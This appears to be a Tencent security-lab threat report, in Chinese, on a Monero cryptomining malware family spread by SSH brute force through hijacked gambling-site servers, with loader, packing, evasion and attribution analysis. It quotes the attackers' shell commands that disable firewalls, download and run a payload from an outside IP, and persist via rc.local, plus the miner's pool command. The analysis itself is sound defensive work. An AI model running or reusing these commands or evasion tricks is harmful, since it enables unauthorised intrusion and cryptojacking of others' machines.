一、前言
騰訊安全云鼎實(shí)驗(yàn)室通過部署的威脅感知系統(tǒng)捕獲了一批挖礦樣本（具有同源性），是一批可挖取門羅幣(xmr)的挖礦病毒。這批樣本今年5月開始出現(xiàn)，目前各大殺軟對(duì)此樣本基本無法有效查殺，騰訊云云鏡第一時(shí)間跟進(jìn)查殺。根據(jù)進(jìn)一步溯源的信息可以推測(cè)該挖礦團(tuán)伙利用被入侵的博彩網(wǎng)站服務(wù)器進(jìn)行病毒傳播。
分析顯示，此挖礦樣本不具有傳播性，總體結(jié)構(gòu)式是 Loader + 挖礦子體，挖礦團(tuán)伙通過控制的機(jī)器進(jìn)行遠(yuǎn)程 SSH 暴力破解并將病毒進(jìn)行傳播。由于目前能對(duì)付此病毒的殺軟極少，且該病毒通過入侵的賭博網(wǎng)站服務(wù)器進(jìn)行病毒傳播、挖礦，讓真相撲朔迷離，云鼎實(shí)驗(yàn)室威脅情報(bào)小組將本次門羅幣挖礦新家族命名為「羅生門」。
二、入侵分析
挖礦樣本通過母體釋放挖礦子體，母體是 Loader ，釋放挖礦子體，執(zhí)行挖礦子體。母體本身不包含 SSH 爆破等蠕蟲動(dòng)作，子體就是單純的挖礦代碼（加殼變形 UPX）。通過觀測(cè)發(fā)現(xiàn)，進(jìn)行 SSH 爆破的主機(jī) IP 較少且固定，可以認(rèn)定為固定機(jī)器，使用工具進(jìn)行掃描、爆破。通過這種廣撒網(wǎng)的方式，犯罪團(tuán)伙能收獲不少門羅幣。
攻擊流程圖：

攻擊過程示意：

攻擊日志來源：http://bikewiki.jp:5000/app/2018/07/27/073148-4879.log
母體 Loader 詳細(xì)分析：
母體 Loader 的行為包含自啟動(dòng)和釋放運(yùn)行文件兩個(gè)部分。

自啟動(dòng)代碼：
在函數(shù) main_Boot 中通過 sed 編輯 rc.local 和 boot.local 來進(jìn)行自啟動(dòng)。
釋放文件：

執(zhí)行文件：

三、病毒子體分析
通過對(duì)挖礦樣本進(jìn)行分析發(fā)現(xiàn)，子體是一個(gè)加殼后的標(biāo)準(zhǔn)礦機(jī)程序，子體加殼也是導(dǎo)致殺軟無法查殺的一個(gè)方式。子體加殼為 UPX 變形殼，可以抵抗通用脫殼機(jī)的脫殼。手動(dòng)脫殼后發(fā)現(xiàn)為標(biāo)準(zhǔn)挖礦程序（開源礦機(jī)程序）。
相關(guān)開源項(xiàng)目連接為：https://github.com/sumoprojects/cryptonote-sumokoin-pool

四、礦池分析與統(tǒng)計(jì)
據(jù)觀測(cè)今年5月至9月初，蜜罐捕獲的「羅生門」挖礦病毒累計(jì)挖出約12.16個(gè)門羅幣，價(jià)值約1w人民幣（2018年10月8日，門羅幣價(jià)格為114.2USD，合計(jì)1388.67美金），算力為8557H/S,大約是皮皮蝦礦池的百分之一算力。從算力上看，這種廣撒網(wǎng)式的傳播，也能有一定的規(guī)模。
挖礦樣本執(zhí)行挖礦的命令如下：
-B -ostratum+tcp://mine.ppxxmr.com:7777-u 41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCM'Qf1FwzqEi-px -k --max-cpu-usage=75
從挖礦命令中可知，挖礦樣本對(duì) CPU 利用率有一定的限制，最大 CPU 使用量為75%。
挖礦樣本針對(duì)的礦池地址和門羅幣(xmr)產(chǎn)量如下：

對(duì)應(yīng)的錢包地址為：
錢包地址：
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT 
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT
45vKgdPY4M3Lp4RXWccWCBFP7HCtcp718GyGaNVmi58j9rdDX716yz5MKXT2EDjFixgPW8mjnaXvz2cBUpEqVCLKFH1z9Tx
45vKgdPY4M3Lp4RXWccWCBFP7HCtcp718GyGaNVmi58j9rdDX716yz5MKXT2EDjFixgPW8mjnaXvz2cBUpEqVCLKFH1z9Tx
41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT
45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT
47xB4pdBngkhgTD1MdF9sidCa6QRXb4gv6qcGkV1TT4XD6LfZPo12CxeX8LCrqpVZm2eN3uAZ1zMQCcPnhWbLoPgNbK8y3Z
41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi
五、免殺分析
1、檢測(cè)效果：
將挖礦樣本在 VirusTotal 中檢測(cè)發(fā)現(xiàn)，除了 Drweb 可以檢出此樣本，其余殺軟均無法有效檢測(cè)此樣本。挖礦病毒5月出現(xiàn)，流行3月有余，VirusTotal 上依然只有1款殺軟可以查殺。
下圖是挖礦樣本在 VirusTotal 中的檢測(cè)結(jié)果：

2、免殺流程：
基本所有殺軟都無法查殺此病毒，此病毒通過 Go 語言 Loader 和子體加變形 UPX 殼進(jìn)行免殺，對(duì)于 Linux 查殺較為薄弱的殺軟，很容易漏報(bào)。
免殺示意圖：

Loader 使用 Go 語言編寫，大量的 Go 語言的庫代碼掩蓋了真正的病毒代碼部分，所以免殺效果較好。2155個(gè) Go 語言庫函數(shù)，真正的病毒代碼包含在4個(gè)函數(shù)中。

六、溯源分析
對(duì)這批挖礦樣本進(jìn)行溯源分析發(fā)現(xiàn)，從今年5月開始，發(fā)起攻擊的 IP一共有兩個(gè)：160.124.67.66、123.249.34.103
另外，樣本下載地址：181.215.242.240、123.249.9.141、 123.249.34.103、58.221.72.157、160.124.48.150
SSH 暴力破解成功后執(zhí)行的命令有（suSEfirewall的關(guān)閉、iptables 的關(guān)閉、樣本的下載）：
/etc/init.d/iptables stop; 
service iptables stop; 
SuSEfirewall2 stop; 
reSuSEfirewall2 stop;cd/tmp;
wget -chttp://181.215.242.240/armtyu;
chmod 777 armtyu;./armtyu;
echo “cd/tmp/”>>/etc/rc.local;
echo”./armtyu&”>>/etc/rc.local;echo “/etc/init.d/iptablesstop
IP 地址 
服務(wù)器地址 
對(duì)外開放服務(wù) 
其他描述 
181.215.242.240 
美國(guó) 
netbios 
ftp、垃圾郵件、僵尸網(wǎng)絡(luò) 
160.124.67.66 
中國(guó) 香港 
netbios 
mmhongcan168.com、28zuche.com、014o.com、ip28.net、掃描 
160.124.48.150 
中國(guó) 香港 
netbios 
ip28.net、掃描 
123.249.9.141 
中國(guó) 貴州 
僵尸網(wǎng)絡(luò) 
（掃描 IP 和下載 IP  信息表）
表格中 160.124.67.66 是掃描 IP，通過對(duì) IP 信息的圖譜聚類，發(fā)現(xiàn)香港的兩臺(tái)主機(jī)均為一個(gè)團(tuán)伙控制的機(jī)器。美國(guó)和貴州的機(jī)器是入侵得到的機(jī)器。

（團(tuán)伙圖聚類）
上面提到的掃描機(jī)器均為賭博網(wǎng)站的機(jī)器，曾經(jīng)的域名mmhongcan168、28zuche 等都是賭博網(wǎng)站。
28zuche：


另一臺(tái)香港機(jī)器的域名為 himitate.com，也是賭博網(wǎng)站。

兩臺(tái)香港主機(jī)均為 ip28.net，都可以作為門羅幣(xmr)的挖礦代理主機(jī)。 
黑產(chǎn)江湖之黑吃黑：
有人的地方就有江湖，黑產(chǎn)作為互聯(lián)網(wǎng)中的法外之地，弱肉強(qiáng)食也是這個(gè)不法之地的規(guī)則。有做大產(chǎn)業(yè)的黑產(chǎn)大佬，也有干一票就走的小團(tuán)伙，黑吃黑幾乎天天都在上演。
賭博網(wǎng)站和色情網(wǎng)站是黑吃黑中常常被吃的對(duì)象，經(jīng)研究分析可知，眾多賭博網(wǎng)站所在的服務(wù)器竟被用來做掃描，各賭博網(wǎng)站之間并沒發(fā)現(xiàn)強(qiáng)關(guān)聯(lián)性，做賭博的團(tuán)伙同時(shí)做挖礦的跨界運(yùn)營(yíng)也不是很多，而且整個(gè)挖礦金額不高。挖礦團(tuán)伙若是入侵了賭博網(wǎng)站，利用其作為病毒服務(wù)器傳播挖礦病毒，這也不是不可能。
對(duì)于美國(guó)和貴州的兩臺(tái)下載機(jī)，根據(jù) threatbook 的情報(bào)，這兩臺(tái)主機(jī)應(yīng)該是肉雞，如下圖：

第二個(gè)掃描地址為：123.249.34.103 
58.221.72.157 
江蘇 
rat 
123.249.34.103 
貴州 
scan 
mdb7.cn 
美國(guó) 
bot 
地理位置：
掃描地址 123.249.34.103的實(shí)際地址為中國(guó)貴州黔西南布依族苗族自治州，相關(guān)的情報(bào)如下：

相關(guān)網(wǎng)站解析過的地址為：
f6ae.com
www.f6ae.com
www.h88049.com
www.h88034.com
h88032.com
www.h88032.com
h88034.com
h88049.com
h5770.com
h88051.com
以上 URL 地址均為賭博網(wǎng)站：

其他的一些情報(bào)：
云鼎實(shí)驗(yàn)室威脅情報(bào)團(tuán)隊(duì)在網(wǎng)絡(luò)上也觀測(cè)到這些 IP 的掃描行為，很多日志都有記錄。可以發(fā)現(xiàn)這個(gè)挖礦樣本的掃描傳播是一種無針對(duì)的、廣撒網(wǎng)式的暴力破解傳播模式。